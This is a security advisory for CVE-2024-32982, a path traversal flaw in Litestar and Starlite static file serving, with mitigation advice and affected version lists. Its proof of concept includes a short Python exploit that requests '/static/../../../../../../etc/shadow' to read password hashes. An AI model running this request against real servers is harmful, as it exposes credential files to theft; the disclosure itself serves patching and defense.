Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS04M3B2LXFyMzMtMnZjZs4AA7xv
Litestar and Starlite vulnerable to Path Traversal
Summary
Local File Inclusion via Path Traversal in LiteStar Static File Serving
A Local File Inclusion (LFI) vulnerability has been discovered in the static file serving component of LiteStar. This vulnerability allows attackers to exploit path traversal flaws, enabling unauthorized access to sensitive files outside the designated directories. Such access can lead to the disclosure of sensitive information or potentially compromise the server.
Details
The vulnerability is located in the file path handling mechanism within the static content serving function, specifically at line 70 in litestar/static_files/base.py
.
The function fails to properly validate the destination file path derived from user input, thereby permitting directory traversal. The critical code segment is as follows:
commonpath([str(directory), file_info["name"], joined_path])
Given the variables:
directory = PosixPath('/Users/brian/sandbox/test_vuln/static')
file_info["name"] = '/Users/brian/sandbox/test_vuln/static/../requirements.txt'
joined_path = PosixPath('/Users/brian/sandbox/test_vuln/static/../requirements.txt')
The function outputs '/Users/brian/sandbox/test_vuln/static', incorrectly assuming it is confined to the static directory. This incorrect validation facilitates directory traversal, exposing the system to potential unauthorized access and manipulation.
Proof of Concept (PoC)
To reproduce this vulnerability, follow these steps:
-
Set up the environment:
- Install with pip the
uvicorn
andlitestar
packages. - Create a
static
folder in the root directory of your project and place any file (e.g., an image) in it for testing. - Ensure the static file serving is enabled, which is typically the default configuration.
- Install with pip the
-
Preparation of the testing environment:
- If using Ubuntu or a similar system, you can use
/etc/shadow
which contains sensitive password information. If not, create a dummy sensitive file outside the static directory for testing. - Create a
main.py
file with the following content to configure and run the LiteStar server:
from pathlib import Path from litestar import Litestar from litestar.static_files import create_static_files_router import uvicorn app = Litestar( route_handlers=[ create_static_files_router(path="/static", directories=["static"]), ], ) if __name__ == "__main__": uvicorn.run("main:app", host="0.0.0.0", port=8000)
- Run this script with the command
python3 main.py
to start the server.
- If using Ubuntu or a similar system, you can use
-
Exploit:
- Prepare an exploit script named
exploit.py
with the following Python code to perform the HTTP request without client-side sanitization:
import http.client def send_request(host, port, path): connection = http.client.HTTPConnection(host, port) connection.request("GET", path) response = connection.getresponse() print(f"Status: {response.status}") print(f"Headers: {response.getheaders()}") data = response.read() print(f"Body: {data.decode('utf-8')}") connection.close() send_request("localhost", 8000, "/static/../../../../../../etc/shadow")
- Execute this script using
python3 exploit.py
. This script uses direct HTTP connections to bypass client-side path sanitization present in tools like curl or web browsers.
- Prepare an exploit script named
-
Observe:
- The server should respond with the contents of the
/etc/shadow
file, thereby confirming the path traversal vulnerability. - The output will display the status, headers, and body of the response, which should contain the contents of the sensitive file.
- The server should respond with the contents of the
Impact
This Local File Inclusion vulnerability critically affects all instances of LiteStar where the server has been configured to serve static files. By exploiting this vulnerability, unauthorized attackers can gain read access to any file that the server process has permission to access. Here are the specific impacts:
-
Exposure of Sensitive Information:
- The ability to traverse the file system can lead to the exposure of highly sensitive information. This includes system configuration files, application logs, or scripts containing credentials or cryptographic keys. Such information can provide attackers with deeper insights into the system architecture or facilitate further attacks.
-
Potential for System Compromise:
- If sensitive system or application configuration files are exposed, attackers might be able to use this information to manipulate system behavior or escalate their privileges. For instance, accessing a
.env
file might reveal environment variables used for application configurations that include database passwords or API keys.
- If sensitive system or application configuration files are exposed, attackers might be able to use this information to manipulate system behavior or escalate their privileges. For instance, accessing a
-
Credential Leakage:
- Access to files such as
/etc/passwd
or/etc/shadow
(on Unix-like systems) could expose user credentials, which might be leveraged to perform further attacks, such as brute force attacks on user accounts or using stolen credentials to access other systems where the same credentials are reused.
- Access to files such as
-
Regulatory and Compliance Violations:
- Unauthorized access to personally identifiable information (PII), payment data, or health records could result in breaches of data protection regulations such as GDPR, HIPAA, or PCI DSS. This could not only damage the reputation of the organization but also lead to heavy fines and legal action.
-
Loss of Trust and Reputation Damage:
- Security incidents, particularly those involving the loss of sensitive data, can significantly damage an organization's reputation. Customers and partners may lose trust, which can impact the business both immediately and in the long term.
-
Potential for Further Exploitation:
- The initial read access gained through this vulnerability might be used as a stepping stone for more severe attacks. For example, if application source code is accessed, it could be analyzed for further vulnerabilities that might lead to direct exploitation, such as remote code execution.
Here's the revised Mitigation Suggestion section for your vulnerability report, focusing on items 1 and 2, and including a reference to a similar implementation in another project:
Mitigation Suggestion
To effectively address the Local File Inclusion vulnerability via path traversal identified in the LiteStar application, it is essential to implement robust input validation and sanitization mechanisms. Below are specific strategies focused on managing user inputs and ensuring secure file path handling:
-
Input Validation and Sanitization:
- Implement rigorous validation of all user-supplied input, particularly file path inputs. This should include sanitizing the input to remove or neutralize potentially harmful characters and sequences such as
../
which are used in path traversal attacks. - Use regular expressions to validate file paths against a strict pattern that only matches expected and safe input.
- Implement rigorous validation of all user-supplied input, particularly file path inputs. This should include sanitizing the input to remove or neutralize potentially harmful characters and sequences such as
-
Path Normalization:
- Normalize file paths before using them in file operations. Functions such as
os.path.normpath()
in Python can be used to normalize paths. This method resolves redundant separators and up-level references (../
) to prevent directory traversal. - As a reference, consider the approach taken by the Starlette framework in their static file serving feature, where path validation is performed to ensure the requested path remains within the intended directory. For example, see how Starlette handles this with a security check:
This snippet from Starlette's implementation ensures that the constructed file path does not traverse out of the specified directory.if os.path.commonpath([full_path, directory]) != directory: # Don't allow misbehaving clients to break out of the static files # directory. continue
- Normalize file paths before using them in file operations. Functions such as
Comments
Naming Convention:
- From versions 0.X.X through 1.X.X, the package was released under the name "starlite."
- Starting with version 2.0.0 and for all subsequent versions, the package has been rebranded and released under the name "litestar."
Feature Additions and Changes:
- Static Files Support: Introduced in version 0.6.0, adding the capability to serve static files directly from the package.
- Path Validation Update: In version 1.37.0, Starlite modified its approach to validating paths within the static directory. Prior to this version, path validation was managed using the Starlette framework.
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04M3B2LXFyMzMtMnZjZs4AA7xv
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: 7 months ago
Updated: 5 months ago
CVSS Score: 8.2
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
Identifiers: GHSA-83pv-qr33-2vcf, CVE-2024-32982
References:
- https://github.com/litestar-org/litestar/security/advisories/GHSA-83pv-qr33-2vcf
- https://github.com/litestar-org/litestar/blob/main/litestar/static_files/base.py#L70
- https://nvd.nist.gov/vuln/detail/CVE-2024-32982
- https://github.com/litestar-org/litestar/commit/57e706e7effdc182fc9a2af5981bc88afb21851b
- https://github.com/litestar-org/litestar/commit/a07b79b84d8717bec5ac4d4674c1e4920ba9c813
- https://github.com/advisories/GHSA-83pv-qr33-2vcf
Blast Radius: 16.3
Affected Packages
pypi:starlite
Dependent packages: 15Dependent repositories: 70
Downloads: 171,145 last month
Affected Version Ranges: >= 1.37.0, < 1.51.16
Fixed in: 1.51.16
All affected versions: 1.37.0, 1.38.0, 1.39.0, 1.40.0, 1.40.1, 1.41.0, 1.42.0, 1.43.0, 1.43.1, 1.44.0, 1.45.0, 1.45.1, 1.46.0, 1.47.0, 1.48.0, 1.48.1, 1.49.0, 1.50.0, 1.50.1, 1.50.2, 1.51.0, 1.51.1, 1.51.2, 1.51.3, 1.51.4, 1.51.5, 1.51.6, 1.51.7, 1.51.8, 1.51.9, 1.51.10, 1.51.11, 1.51.12, 1.51.13, 1.51.14, 1.51.15
All unaffected versions: 0.1.0, 0.1.1, 0.1.2, 0.1.3, 0.1.4, 0.1.5, 0.1.6, 0.2.0, 0.2.1, 0.3.0, 0.4.0, 0.4.1, 0.4.2, 0.4.3, 0.5.0, 0.6.0, 0.7.0, 0.7.1, 0.7.2, 1.0.0, 1.0.1, 1.0.2, 1.0.3, 1.0.4, 1.0.5, 1.1.0, 1.1.1, 1.2.0, 1.2.2, 1.2.3, 1.2.4, 1.2.5, 1.3.0, 1.3.1, 1.3.2, 1.3.3, 1.3.4, 1.3.5, 1.3.6, 1.3.7, 1.3.8, 1.3.9, 1.4.0, 1.4.1, 1.4.2, 1.5.0, 1.5.1, 1.5.2, 1.5.3, 1.5.4, 1.6.0, 1.6.1, 1.6.2, 1.7.0, 1.7.1, 1.7.2, 1.7.3, 1.8.0, 1.8.1, 1.9.0, 1.9.1, 1.10.0, 1.10.1, 1.11.0, 1.11.1, 1.12.0, 1.13.0, 1.13.1, 1.14.0, 1.14.1, 1.14.2, 1.15.0, 1.16.0, 1.16.1, 1.16.2, 1.17.0, 1.17.1, 1.17.2, 1.18.0, 1.18.1, 1.19.0, 1.20.0, 1.21.0, 1.21.1, 1.21.2, 1.23.0, 1.23.1, 1.24.0, 1.25.0, 1.26.0, 1.26.1, 1.27.0, 1.28.0, 1.28.1, 1.29.0, 1.30.0, 1.31.0, 1.32.0, 1.33.0, 1.34.0, 1.35.0, 1.35.1, 1.36.0, 1.51.16
pypi:litestar
Dependent packages: 23Dependent repositories: 96
Downloads: 236,243 last month
Affected Version Ranges: >= 2.0.0, < 2.6.4, >= 2.7.0, < 2.7.2, >= 2.8.0, < 2.8.3
Fixed in: 2.6.4, 2.7.2, 2.8.3
All affected versions: 2.0.0, 2.0.1, 2.1.0, 2.1.1, 2.2.0, 2.2.1, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.4.2, 2.4.3, 2.4.4, 2.4.5, 2.5.0, 2.5.1, 2.5.2, 2.5.3, 2.5.4, 2.5.5, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.7.0, 2.7.1, 2.8.0, 2.8.1, 2.8.2
All unaffected versions: 2.6.4, 2.7.2, 2.8.3, 2.9.0, 2.9.1, 2.10.0, 2.11.0, 2.12.0, 2.12.1, 2.13.0